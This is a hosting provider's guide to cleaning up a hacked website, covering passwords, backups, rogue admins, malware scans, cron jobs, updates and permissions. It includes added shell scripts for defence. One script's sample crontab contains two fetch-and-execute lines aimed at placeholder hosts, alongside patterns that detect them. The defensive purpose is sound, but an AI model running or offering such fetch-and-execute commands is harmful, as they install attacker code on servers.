How to Recover from a Website Hack (And Prevent Another One)
Follow these steps to clean up a compromised website, remove backdoors, and lock things down so hackers cannot get back in.
Getting hacked is stressful, but it is not the end of the world - most sites can be recovered quickly with the right steps. This guide explains what likely happened, walks you through the cleanup, and shows you how to stop it happening again.
Step one: breathe
At Kualo, we have built a multi-layered security system to keep your site safe - firewalls that make split-second calls on threats, malware scanners that never sleep, real-time exploit blocking, and automated patching that shuts down thousands of vulnerabilities every day. We enforce strong passwords, flag risky plugins, and stop millions of attacks before they get close.
But security is a shared effort. We handle the heavy lifting - fighting off attackers, keeping our servers secure, giving you all the tools to stay protected. No matter how strong the castle walls are, though, if someone inside opens a window, a hacker has an opportunity to slip in.
How did this happen?
You might be thinking: "If all these security measures are in place, how is a hack even possible?"
The short answer: it almost certainly was not a failure in our server-side security.
The vast majority of website breaches happen because of something inside the account itself. A password leaked in a data breach, an outdated plugin containing a vulnerability, a phishing email that tricked someone into handing over login details - these are the most common entry points.
It is like defending a castle from thousands of incoming arrows. We block most of them, but if just one gets through - because a door was left open (a vulnerability) or a guard was tricked into letting someone in (a stolen password) - that is all it takes.
We can stop brute-force attacks and botnets, and defend against many known exploits. But we cannot patch a password that is already exposed or a plugin that has not been updated in three years and has a gaping security hole. That is why keeping your passwords secure, your software updated, and 2FA enabled is absolutely critical.
Here are the most common ways hackers get in - and how to stop them.
1. Compromised credentials
- Using weak or reused passwords.
- Storing passwords in emails or unsecured documents.
- Password theft via malware on your device.
Our systems enforce strong password policies - both cPanel and MyKualo require secure passwords, and for WordPress and some other CMS platforms we detect and block weak or compromised passwords at login, and block brute-force attempts.
The most common way credentials get compromised, though, is not because someone guessed your password - it is because they already have it. Maybe it was leaked in a data breach, maybe a phishing email tricked you into handing it over, or maybe malware on your device silently stole it.
To stay ahead: always use unique passwords for each service (a password manager helps enormously), enable Two-Factor Authentication (2FA), and never enter your credentials into a site you did not explicitly navigate to.
You can check whether your email or password has appeared in a known data breach at Have I Been Pwned.
2. Unpatched software and plugins
- Running outdated WordPress, Joomla, or other CMS platforms.
- Vulnerable plugins or themes that have not been updated.
- Plugins that are abandoned (no longer receive updates) but are still installed.
A vulnerability is like a crack in your site's armour - hackers are constantly scanning for these cracks. The vast majority of website hacks happen because of known vulnerabilities in outdated software.
At Kualo, we tackle this with Patchman, which automatically detects and patches vulnerabilities in common CMS applications like WordPress, Joomla, and Drupal. These patches are backported, meaning you get essential security fixes without needing to jump to a major new version that could break your site. WP Toolkit helps automate updates using Smart Updates, so you can test changes safely before applying them live.
Not everything can be patched automatically, though. Some plugins and themes are abandoned by their developers, leaving security flaws permanently exposed. For WordPress users, WP Toolkit scans installations for vulnerabilities, even in seemingly up-to-date plugins that are no longer maintained. Softaculous also detects outdated applications across different CMSs and provides easy upgrade options.
Security starts with vulnerability-free software. No security system is invincible if the code itself is inherently vulnerable.
3. Backdoors and persistent malware
- Hackers may create unauthorised CMS admin users.
- Malicious cron jobs and scripts can reinfect your site even after cleanup.
- Database injections can add hidden admin accounts or malicious redirects.
Once a hacker gets inside, they rarely just walk away - they leave behind secret tunnels, hidden keys, and open windows so they can return whenever they like. Cleaning up visible malware is not enough; you need to hunt down and eliminate any backdoors too.
Hackers commonly add unauthorised admin users, create malicious cron jobs, or hide scripts deep in your site files to keep their access alive. Regularly auditing admin users, checking cron jobs, and running WP Toolkit's integrity checker can help you spot and remove these hidden threats.
If you are ever unsure, restoring your site to a clean state from before the compromise is a reliable way to remove hidden threats - but make sure you fix the original vulnerability first. Otherwise you are just rolling out a welcome mat for the attacker to come right back in.
4. Compromised email account
- If an attacker accesses your email, they can reset your hosting or CMS password.
- Check for suspicious email forwarding rules.
Your email account is a treasure trove - password resets, account verification links, and communication history all live there. If an attacker gains access, they can reset your hosting or CMS password and use your email to infiltrate other services. Never store passwords in plain-text emails, as compromised email accounts are a leading cause of security breaches.
Enable Two-Factor Authentication (2FA) on all your accounts - including MyKualo and cPanel - to add an extra layer of security. Regularly check for unauthorised email forwarders in cPanel to ensure no one is secretly redirecting your emails. If your email has been compromised, assume all linked accounts could also be at risk and change passwords immediately.
Immediate action: what to do right now
Now you know how hackers sneak in - bad passwords, outdated plugins, backdoors, the usual horror show. Knowing how they got in does not fix the fact that they are currently inside your house, probably rearranging your furniture. Here is your action plan to kick them out and change the locks.
Step 1: scan your local computer for malware
- If your device is infected, changing passwords will not help.
- Run a full scan with reputable antivirus software.
Hackers often use keyloggers and other stealthy malware to steal credentials the moment you type them, so even the strongest password will not help if your device is already compromised. Before changing any passwords, run a full malware scan with a trusted security tool. Consider running an anti-malware scanner alongside your antivirus to catch more advanced threats.
Whether you are on Windows, macOS, or Linux, you should always have a trusted antivirus program installed and running regular scans. Macs can and do get malware - that is a myth worth busting.
Step 2: change all passwords
- Update passwords for cPanel, FTP, databases, your CMS (WordPress, Joomla, Magento, etc.), and email accounts.
- Use strong, unique passwords everywhere - no repeats, no easy guesses.
- Never store passwords in plain text (emails, notes, or sticky notes are not secure storage).
- Enable 2FA wherever possible.
If just one of your passwords is compromised, hackers will try it everywhere - your hosting, email, database, even your social accounts. Here is what to update.
cPanel / hosting control panel
Your cPanel password controls everything - file access, databases, email accounts, cron jobs, and more. Change this first and set up 2FA at the same time.
FTP accounts
A compromised FTP account lets attackers modify your site without needing CMS access. Check for any unknown FTP accounts under cPanel > FTP Accounts and reset all passwords.
Database passwords
Your database contains all your content, user accounts, and critical site data. If an attacker had access, they could still manipulate your site even after you clean up everything else.
For WordPress:
- Open wp-config.php in File Manager or via FTP.
- Find the line:
define( 'DB_PASSWORD', 'yourpassword' );
- Replace the password with a new strong one.
- Update the database user password in cPanel > MySQL Databases to match.
For Joomla, Magento, or other CMSs, look for a configuration file (configuration.php, env.php, or settings.php) where database credentials are stored and update accordingly.
CMS admin passwords (WordPress, Joomla, Magento, etc.)
Your CMS is usually the first thing a hacker targets. Reset all admin-level passwords and review user accounts for suspicious new admins - attackers often create backdoor users. In WordPress, go to Users > All Users and remove any unknown admins.
Email accounts
Change all email passwords in cPanel > Email Accounts, particularly if you suspect the hacker gained access to your hosting account as a whole.
Third-party services (domain registrars, payment providers, CRMs, etc.)
Reset passwords for any external services too. A compromised registrar account could allow an attacker to transfer your domain away - which is a nightmare scenario.
Keeping passwords secure going forward
- Use a password manager such as Bitwarden, 1Password, or LastPass to generate and store unique passwords.
- Never reuse passwords across multiple services.
- Enable 2FA wherever possible, especially for email, cPanel, and CMS logins.
- Regularly audit your admin and FTP accounts to remove old or unused access.
Step 3: restore a clean backup (if needed)
Restoring from a backup can be the fastest way to recover from a hack, but it is worth deciding whether it is the right approach before you proceed.
When a backup is the best option:
- The attack happened recently and you have a known clean backup from before the compromise.
- Your site has not changed significantly since the last backup - this matters especially for eCommerce stores, forums, or membership sites where restoring could overwrite orders, signups, or content.
- You would rather restore than manually clean files (as long as you fix the original vulnerability afterwards).
When to be cautious about restoring:
- The hack may have been present for a while, meaning older backups could still contain the compromise.
- You have made significant content updates, transactions, or changes that would be lost if you roll back.
- You are unsure when the hack occurred and need to investigate further before restoring.
How to decide
- Check file modification timestamps - in cPanel > File Manager, sort files by Last Modified to identify when changes were made. If many files were altered around the same time, that could be the moment of compromise.
- Review access and malware logs - if you have Imunify360 in cPanel, check its logs for malware detections and timestamps. Also look at cPanel access logs for unknown logins.
- Determine the best restore option - you can restore just the site files while keeping the database intact, or restore the database separately if you have a clean snapshot. If you are unsure, our team can help you work out the best approach.
If you restore from a backup, you must still complete the remaining steps to patch the original security hole - otherwise the hacker can simply get back in.
If you are unsure when the hack occurred, open a support ticket and we can help you analyse the timeline.
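The timestamp check from "How to decide", done over SSH rather than in File Manager, as an added example (not Kualo's own tooling): it counts files per last-modified day so a burst of changes stands out. It assumes GNU find (for -printf); the sample tree, its file names and its dates are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: bucket files by last-modified day to spot a burst of changes.
# Assumption: GNU find, which provides -printf.

# mod_histogram DIR -> lines "COUNT YYYY-MM-DD", busiest day first
mod_histogram() {
    find "$1" -type f -printf '%TY-%Tm-%Td\n' \
        | sort | uniq -c \
        | awk '{ print $1, $2 }' \
        | sort -k1,1nr -k2,2r
}

# busiest_day DIR -> the day on which the most files were last modified
busiest_day() {
    mod_histogram "$1" | awk 'NR == 1 { print $2 }'
}

# files_on_day DIR YYYY-MM-DD -> paths last modified on that day, sorted
files_on_day() {
    find "$1" -type f -printf '%TY-%Tm-%Td %p\n' \
        | awk -v day="$2" '$1 == day { sub(/^[^ ]+ /, ""); print }' \
        | sort
}

# Constructed sample tree: three files share one modification day.
build_demo_tree() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/wp-content/uploads"
    touch -t 202401101200 "$d/index.php" "$d/wp-login.php"
    touch -t 202402141200 "$d/wp-content/style.css"
    touch -t 202403051200 "$d/wp-config-extra.php" \
        "$d/wp-content/uploads/cache.php" "$d/wp-content/uploads/x.php"
    echo "$d"
}

# Demo on the constructed tree; on a real account pass ~/public_html instead.
demo=$(build_demo_tree)
mod_histogram "$demo"
files_on_day "$demo" "$(busiest_day "$demo")"
rm -rf "$demo"
```

A busy day is only a lead: a legitimate CMS or plugin update also touches many files at once, so compare the date against your own update history.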
Step 4: review and remove suspicious admin users
- Check for unauthorised admin users in your CMS (WordPress, Joomla, Magento, or other platforms).
- Remove any unknown accounts with elevated privileges.
- If you are locked out, access the database via phpMyAdmin to check and remove rogue users - we can help you regain access if needed.
One of the first things attackers do after breaching a site is create a backdoor admin account so they can return even after you have cleaned up. If you spot an unfamiliar admin user, delete them immediately.
If you are locked out of your CMS, access can usually be regained via Softaculous or WP Toolkit, or contact us and we can help via other means.
Step 5: scan and remove malicious code
- Use Imunify360 in cPanel to scan for and remove malware automatically.
- Manually check for unknown or suspicious files in public_html and other critical directories.
Imunify360 is constantly on guard, automatically scanning and removing threats - but no malware scanner is 100% foolproof, which is why a manual check is still worth your time.
Open cPanel's File Manager, sort files by last modified date, and actually open any unexpected files to see what is inside. If a file named wp-config-extra.php suddenly appeared at 2:13 AM on a Tuesday and you do not remember creating it, it is probably not your friend.
Imunify360 is included with all Kualo shared hosting plans. If you are running your own server, you may have ImunifyAV instead, which does not offer real-time scanning - so running a full manual scan is essential. See our introduction to Imunify360 for more detail.
For WordPress users, use WP Toolkit to verify the integrity of core files - it can tell you if any system files have been tampered with and restore them with a single click. Follow that up with a manual sweep of your public_html folder, looking for strange filenames, unexpected scripts, or anything lurking in directories that should not be there.
Step 6: review cron jobs in cPanel
- Go to cPanel > Cron Jobs and look for anything suspicious.
Cron jobs are your website's automated to-do list - normally used for useful things like clearing cache, running backups, or sending emails. If a hacker gets in, they can weaponise cron jobs to keep their attack running indefinitely.
A malicious cron job can remotely download and execute malware without even writing a file to your server. That means even if you wipe your site clean, the infection could come straight back. Imunify360's Proactive Defence helps by blocking suspicious PHP executions in real time, but it is best to be certain by removing anything that should not be there.
Look closely at your cron jobs in cPanel. If you see a command you do not recognise - especially anything fetching files from a remote server using wget, curl, or pointing to an unfamiliar URL - that is a serious red flag. Disable it immediately and investigate, or reach out to us.
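The same review done over SSH, as an added example (not part of cPanel or Kualo's tooling): a filter that reads crontab text and flags the red flags named above, wget, curl and remote URLs. The pipe-to-interpreter check goes one step beyond the text, and the sample crontab, its paths and its addresses are constructed.

```shell
#!/bin/sh
# Added example: flag cron entries that fetch or execute remote content.

# flag_cron: crontab text on stdin -> "LINENO: [reasons] entry" per suspicious line
flag_cron() {
    awk '
        /^[ \t]*#/ { next }     # skip comments
        /^[ \t]*$/ { next }     # skip blank lines
        {
            line = " " $0 " "   # pad so a tool name at either end still matches
            r = ""
            if (line ~ /[^A-Za-z0-9_](wget|curl)[^A-Za-z0-9_]/)
                r = r "fetch-tool,"
            if (line ~ /(https?|ftp):\/\//)
                r = r "remote-url,"
            if (line ~ /\|[ \t]*(sh|bash|php)[^A-Za-z0-9_]/)
                r = r "pipe-to-interpreter,"
            if (r != "") {
                sub(/,$/, "", r)
                printf "%d: [%s] %s\n", NR, r, $0
            }
        }'
}

# Constructed sample crontab: two ordinary jobs and two that should be flagged.
sample_crontab() {
    cat <<'EOF'
MAILTO=""
# nightly site cron
0 3 * * * /usr/local/bin/php /home/user/public_html/wp-cron.php >/dev/null 2>&1
*/10 * * * * curl -s http://203.0.113.10/u.txt | sh
15 * * * * /home/user/bin/rotate-logs.sh
@daily wget -q -O /tmp/.c https://example.invalid/c && php /tmp/.c
EOF
}

# Demo on the constructed sample; on a real account run: crontab -l | flag_cron
sample_crontab | flag_cron
```

A flagged line is a prompt to review rather than proof of compromise, since legitimate jobs sometimes request a URL on your own site with curl or wget.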
Step 7: update everything
- Update all your software - core, plugins, themes, and PHP version where compatible.
- If you are using WordPress, use WP Toolkit's vulnerability scanner to detect risky plugins.
Running outdated code is like leaving your front door unlocked with a sign that says "welcome, hackers". The majority of website compromises happen not because of some genius attacker, but because of unpatched vulnerabilities that attackers already know how to exploit.
For WordPress users, start with WP Toolkit's vulnerability scanner - it flags plugins and themes with known security issues. Prioritise anything marked as vulnerable. If a plugin is vulnerable but has no available update, it may have been abandoned by its developer and you will need a secure alternative.
On PHP versions: updating PHP matters for both performance and security, but we know some sites rely on older versions for compatibility. We run hardened PHP, meaning even older versions are protected from many vulnerabilities even if they are no longer in mainstream support. That said, outdated application code can still be a risk - if you need an old PHP version to keep your site running, it is probably time to update your site's code as well.
If you are worried about updates breaking things, WP Toolkit's Smart Updates lets you test updates in a safe environment before applying them live, and can be set to run automatically. For non-WordPress sites, you can clone your site or use staging in Softaculous to test major updates before touching your live site.
Step 8: check email forwarding and filters
- In cPanel > Email Filters, remove any unauthorised forwarding rules.
Your email account can be the master key to everything. If an attacker gains access, they can reset passwords and take over accounts - and they do not even need full access to cause damage. They just need to quietly forward your emails somewhere else.
A common attacker trick is setting up forwarding rules that send copies of incoming emails (including password reset links) to their own inbox, letting them watch and wait for an opportunity. Since this does not require ongoing full access, you might not notice it is happening.
Go to cPanel > Email Filters and look for any forwarding rules you do not remember setting up. If you see a rule forwarding to an unknown external address, delete it immediately. Even if nothing looks suspicious, reviewing these settings regularly is a good habit.
Step 9: review file and folder permissions
- Files should be 644, folders 755.
- Do not set files to 777 (full permissions).
Think of file permissions like the security settings on your house. 644 means only the owner can modify a file. 755 means folders can be read and accessed but not changed by just anyone. 777 is like leaving your front door wide open and taping a spare key to the letterbox.
Hackers love overly permissive file settings because they allow malicious scripts to be uploaded, existing files to be modified, or your site to be wiped entirely. Some older guides or plugins may suggest setting files to 777 to "fix" permission issues - do not do it. Review your file and folder permissions in cPanel > File Manager or via SSH to ensure everything is locked down properly.
For WordPress users, WP Toolkit's Security Measures can automatically fix incorrect file permissions and apply other security hardening measures.
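For the SSH route, an added example (not Kualo's or WP Toolkit's own code) that lists anything writable by group or others and resets only those entries to the 644 and 755 values given above, leaving stricter modes such as a 600 wp-config.php untouched. The sample tree and its file names are constructed.

```shell
#!/bin/sh
# Added example: find and tighten entries looser than 644 (files) / 755 (folders).

# loose_files DIR -> files writable by group or others (e.g. 664, 666, 777)
loose_files() {
    find "$1" -type f \( -perm -0020 -o -perm -0002 \) | sort
}

# loose_dirs DIR -> directories writable by group or others (e.g. 775, 777)
loose_dirs() {
    find "$1" -type d \( -perm -0020 -o -perm -0002 \) | sort
}

# tighten DIR -> reset only the loose entries; stricter modes are left alone
tighten() {
    find "$1" -type f \( -perm -0020 -o -perm -0002 \) -exec chmod 644 {} +
    find "$1" -type d \( -perm -0020 -o -perm -0002 \) -exec chmod 755 {} +
}

# Constructed sample tree with one 777 folder and one 666 file.
build_perm_demo() {
    p=$(mktemp -d) || return 1
    mkdir "$p/uploads" "$p/includes"
    : > "$p/index.php"
    : > "$p/wp-config.php"
    : > "$p/uploads/img.php"
    chmod 755 "$p" "$p/includes"
    chmod 777 "$p/uploads"
    chmod 644 "$p/index.php"
    chmod 600 "$p/wp-config.php"
    chmod 666 "$p/uploads/img.php"
    echo "$p"
}

# Demo on the constructed tree; on a real account pass ~/public_html instead.
demo=$(build_perm_demo)
echo "Loose files:";   loose_files "$demo"
echo "Loose folders:"; loose_dirs "$demo"
tighten "$demo"
echo "Remaining after tighten: $(loose_files "$demo"; loose_dirs "$demo")"
rm -rf "$demo"
```

Run the two listing functions first and read the output before calling tighten, because a world-writable upload folder is also where to look for files that should not be there.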
Keeping your site secure going forward
Recovering from a hack is not fun, but you can prevent it from happening again - and it is easier than you might think.
If you take away just three things from this guide, make them these:
- Keep everything updated - your CMS, plugins, themes, and PHP where possible.
- Use strong, unique passwords for every service - reusing passwords is like using the same key for your house, car, and office. If one gets stolen, everything is at risk.
- Enable 2FA - this shuts down most password-based attacks before they even start.
With those in place - plus our firewall protection, malware scanning, and proactive security layers - your site will be about as hacker-proof as it gets. Could someone still break in? Sadly, there are never any guarantees, but hackers look for low-hanging fruit, and your site will not be it.
One more thing worth knowing: how your hosting is structured matters. If you have multiple sites inside one cPanel account using addon domains, a breach in one can spread to the others. Keeping applications separate, updated, and isolated makes life much harder for attackers.
Not sure if your setup is secure? See our guide on addon domains and when they are a good or bad idea.
And if something still seems off - we have got your back. If you ever suspect a security issue, need help investigating unusual activity, or want a second opinion before making changes, our support team is here.
Security is not about being invincible - it is about making your site so annoying to hack that attackers give up and move on. Do the basics, use the tools we provide, and your site will be one of the hardest targets around.